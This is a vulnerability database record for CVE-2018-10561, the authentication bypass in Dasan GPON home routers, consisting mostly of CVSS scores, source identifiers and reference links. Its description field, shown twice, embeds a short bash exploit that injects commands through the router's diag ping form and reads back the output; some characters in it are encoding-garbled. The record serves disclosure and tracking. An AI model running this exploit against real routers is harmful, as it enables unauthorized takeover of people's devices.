var-201805-0262
Vulnerability from variot
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash
echo "[+] Sending the Commanda| "
We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`$2`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\n/\n/ga
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gpon router",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "gpon routers",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon router",
"scope": "eq",
"trust": 0.3,
"vendor": "dasan",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:gpon_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "None",
"sources": [
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.9
},
"cve": "CVE-2018-10561",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-10561",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09230",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-120333",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-10561",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-10561",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-10561",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-09230",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-189",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-120333",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10561",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \\342\\200\\230?images\\342\\200\\231 to any of the device\u0027s URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. \nAn attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash\n \necho \"[+] Sending the Commanda| \"\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\ncurl -k -d \"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=\\`$2\\`;$2\u0026ipv=0\" $1/GponForm/diag_Form?images/ 2\u003e/dev/null 1\u003e/dev/null\necho \"[+] Waitinga|.\"\nsleep 3\necho \"[+] Retrieving the ouputa|.\"\ncurl -k $1/diag.html?images/ 2\u003e/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10561"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "PACKETSTORM",
"id": "147482"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-120333",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44576",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10561",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "44576",
"trust": 3.2
},
{
"db": "BID",
"id": "107053",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885",
"trust": 0.8
},
{
"db": "EXPLOITDB",
"id": "44576",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-09230",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "147482",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-120333",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10561",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"id": "VAR-201805-0262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
}
]
},
"last_update_date": "2024-11-23T22:00:31.436000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "GPONHomeRouters security bypass vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/128597"
},
{
"title": "Dasan GPON Home router security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79885"
},
{
"title": "Brocade Security Advisories: BSA-2018-603",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=b192ae1777abead866cbeb7d8a56bb12"
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/manyunya/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/ethicalhackeragnidhra/GPON "
},
{
"title": "CVE-2018-10562",
"trust": 0.1,
"url": "https://github.com/ATpiu/CVE-2018-10562 "
},
{
"title": "GPON-home-routers-Exploit",
"trust": 0.1,
"url": "https://github.com/vhackor/GPON-home-routers-Exploit "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/f3d0x0/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/Truongnn92/GPON "
},
{
"title": "underattack-py",
"trust": 0.1,
"url": "https://github.com/underattack-today/underattack-py "
},
{
"title": "Sniper",
"trust": 0.1,
"url": "https://github.com/samba234/Sniper "
},
{
"title": "Kn0ck",
"trust": 0.1,
"url": "https://github.com/telnet22/Kn0ck "
},
{
"title": "Sn1per",
"trust": 0.1,
"url": "https://github.com/unusualwork/Sn1per "
},
{
"title": "Sn1per",
"trust": 0.1,
"url": "https://github.com/oneplus-x/Sn1per "
},
{
"title": "api.greynoise.io",
"trust": 0.1,
"url": "https://github.com/GreyNoise-Intelligence/api.greynoise.io "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/PoC-in-GitHub "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "https://www.exploit-db.com/exploits/44576/"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/107053"
},
{
"trust": 2.1,
"url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10561"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10561"
},
{
"trust": 0.3,
"url": "http://www.dasannetworks.com/en/"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/manyunya/gpon"
},
{
"trust": 0.1,
"url": "https://github.com/atpiu/cve-2018-10562"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10562"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120333"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"date": "2018-05-04T00:32:22",
"db": "PACKETSTORM",
"id": "147482"
},
{
"date": "2018-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"date": "2018-05-04T03:29:00.227000",
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"date": "2019-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120333"
},
{
"date": "2019-03-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"date": "2019-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"date": "2024-11-21T03:41:33.423000",
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON home router Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.